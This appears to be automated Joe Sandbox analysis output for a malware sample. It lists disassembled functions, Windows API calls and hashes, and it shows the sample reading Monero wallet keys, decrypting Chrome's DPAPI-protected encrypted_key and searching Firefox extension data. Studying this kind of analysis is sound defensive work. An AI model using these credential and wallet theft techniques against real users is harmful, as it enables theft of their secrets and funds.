Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 94fdcc544fb19a9bc582b1cf3089ed9c84813fd3a1994099226eb96c785df6d9
Instruction ID: fc3ef1c93291ec7b39fd18d07124bfbf4be222d395daccfb4799981f64bfb49d
Opcode Fuzzy Hash: 94fdcc544fb19a9bc582b1cf3089ed9c84813fd3a1994099226eb96c785df6d9
Instruction Fuzzy Hash: 1601E6B5E40208BBDB04DFD4DC59FAEB7BCEB48701F108155FA1597280DAB59A018F51

Function 0097A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00849058,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0097A0BD
LoadLibraryA.KERNEL32(0084D9E0), ref: 0097A146

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A820: lstrlen.KERNEL32(00974F05,?,?,00974F05,00990DDE), ref: 0098A82B
Part of subcall function 0098A820: lstrcpy.KERNEL32(00990DDE,00000000), ref: 0098A885

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

SetEnvironmentVariableA.KERNEL32(00849058,00000000,00000000,?,009912D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00990AFE), ref: 0097A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0097A0B2, 0097A0C6, 0097A0DC

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 2f12638707ddeaee24cf1086df7db139bdd6265980ae8f1a87c784de73eb15c7
Instruction ID: cb297733d681d5ef9d9820f87561d4b9a01e7dcea1e0c8ec7a8b46f607932073
Opcode Fuzzy Hash: 2f12638707ddeaee24cf1086df7db139bdd6265980ae8f1a87c784de73eb15c7
Instruction Fuzzy Hash: 5D4163F2D01204AFDB04EFA4EC95BAE77B8BB89301F544219F506A32A1DFB55944CB63

Function 0097A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 00988B60: GetSystemTime.KERNEL32(00990E1A,0084A570,009905AE,?,?,009713F9,?,0000001A,00990E1A,00000000,?,00849138,?,\Monero\wallet.keys,00990E17), ref: 00988B86

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0097A3FF
lstrlen.KERNEL32(00000000), ref: 0097A6BC

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

DeleteFileA.KERNEL32(00000000), ref: 0097A743

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 36384ce47bd3382fc6fbd3d981dd4c3344ccb8aacf937b7a8e48688fa6d0997a
Instruction ID: 4a4db31c3e578795a903e45bc64432836f57bb665b08605a7eb19700c08940c3
Opcode Fuzzy Hash: 36384ce47bd3382fc6fbd3d981dd4c3344ccb8aacf937b7a8e48688fa6d0997a
Instruction Fuzzy Hash: 4CE1C272C101189BEB05FBA4DC91FEE7338AF94300F50815AF516B6191EF786A49CB76

Function 0097D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 00988B60: GetSystemTime.KERNEL32(00990E1A,0084A570,009905AE,?,?,009713F9,?,0000001A,00990E1A,00000000,?,00849138,?,\Monero\wallet.keys,00990E17), ref: 00988B86

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D801
lstrlen.KERNEL32(00000000), ref: 0097D99F
lstrlen.KERNEL32(00000000), ref: 0097D9B3
DeleteFileA.KERNEL32(00000000), ref: 0097DA32

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4cfe6a43100a781396f625b4e8ff5704efa508aff471852a883d73b6ec2b0062
Instruction ID: 0e255badecec79e55e44863702fb1a52a30bf648c2e0a97552fe1039482e40be
Opcode Fuzzy Hash: 4cfe6a43100a781396f625b4e8ff5704efa508aff471852a883d73b6ec2b0062
Instruction Fuzzy Hash: 2C8100729101049BEB08FBA4DC96FEE7339AF94300F50415AF517A7291EF786A09CB76

Function 0097F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009799EC
Part of subcall function 009799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00979A11
Part of subcall function 009799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00979A31
Part of subcall function 009799C0: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 00979A5A
Part of subcall function 009799C0: LocalFree.KERNEL32(0097148F), ref: 00979A90
Part of subcall function 009799C0: CloseHandle.KERNEL32(000000FF), ref: 00979A9A

Part of subcall function 00988E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988E52

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00991580,00990D92), ref: 0097F54C
lstrlen.KERNEL32(00000000), ref: 0097F56B

Strings

^userContextId=4294967295, xrefs: 0097F59C
moz-extension+++, xrefs: 0097F5AD

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 60c1824bc6f5c5c036d505c5b62badc0a3fa764e605287fd276f0b6e12367c77
Instruction ID: eb568cf3258e6d74fa1e81b433fcb3f9b4b52e9e8ea978503c1735cc3db5a93a
Opcode Fuzzy Hash: 60c1824bc6f5c5c036d505c5b62badc0a3fa764e605287fd276f0b6e12367c77
Instruction Fuzzy Hash: 9751D472D101089BEB04FBA4DC56EED7379AFD4300F508529F416A7291EF386A09CBA6

Function 00979CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 009799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009799EC
Part of subcall function 009799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00979A11
Part of subcall function 009799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00979A31
Part of subcall function 009799C0: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 00979A5A
Part of subcall function 009799C0: LocalFree.KERNEL32(0097148F), ref: 00979A90
Part of subcall function 009799C0: CloseHandle.KERNEL32(000000FF), ref: 00979A9A

Part of subcall function 00988E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00979D39

Part of subcall function 00979AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974EEE,00000000,00000000), ref: 00979AEF
Part of subcall function 00979AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00974EEE,00000000,?), ref: 00979B01
Part of subcall function 00979AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974EEE,00000000,00000000), ref: 00979B2A
Part of subcall function 00979AC0: LocalFree.KERNEL32(?,?,?,?,00974EEE,00000000,?), ref: 00979B3F

Part of subcall function 00979B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00979B84
Part of subcall function 00979B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00979BA3
Part of subcall function 00979B60: LocalFree.KERNEL32(?), ref: 00979BD3

Strings

, xrefs: 00979DC1
DPAPI, xrefs: 00979D89
"encrypted_key":", xrefs: 00979D30

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 96545fce54f517b3c8a60bd99a260892de876a66f06c00fe880cae926fcd0024
Instruction ID: 252d7406f70f59e80d1b1f48e9dd5f324260a0b34ad66088d7ce3a76c3c00206
Opcode Fuzzy Hash: 96545fce54f517b3c8a60bd99a260892de876a66f06c00fe880cae926fcd0024
Instruction Fuzzy Hash: E4310FB6D10109ABDF14EBE4DC85AEE77B8EB88704F148519E915A7281EB349A04CBA1

Function 00986AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00848F18,?,0099110C,?,00000000,?,00991110,?,00000000,00990AEF), ref: 00986ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986AE8
CloseHandle.KERNEL32(00000000), ref: 00986AF9
Sleep.KERNEL32(00001770), ref: 00986B04
CloseHandle.KERNEL32(?,00000000,?,00848F18,?,0099110C,?,00000000,?,00991110,?,00000000,00990AEF), ref: 00986B1A
ExitProcess.KERNEL32 ref: 00986B22

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
